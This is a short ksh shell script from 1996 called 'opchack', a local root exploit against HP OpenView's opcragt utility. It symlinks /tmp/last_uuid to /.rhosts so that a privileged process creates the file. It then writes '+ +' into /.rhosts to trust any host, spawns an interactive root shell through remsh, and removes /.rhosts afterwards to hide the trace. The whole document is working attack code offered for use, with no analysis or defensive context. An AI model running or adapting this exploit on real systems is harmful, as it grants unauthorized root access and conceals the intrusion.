#!/bin/ksh
#
# opchack (C) 1996 Dog Catcher
# if /.rhosts does not exist then this will create one and
# plop a nice little + + inside

rm -f /tmp/last_uuid
ln -s /.rhosts /tmp/last_uuid
/opt/OV/bin/OpC/opcragt `uname -n`

echo '+ +' > /.rhosts

remsh `uname -n` -l root ksh -i

remsh `uname -n` -l root rm -f /.rhosts
rm /tmp/last_uuid

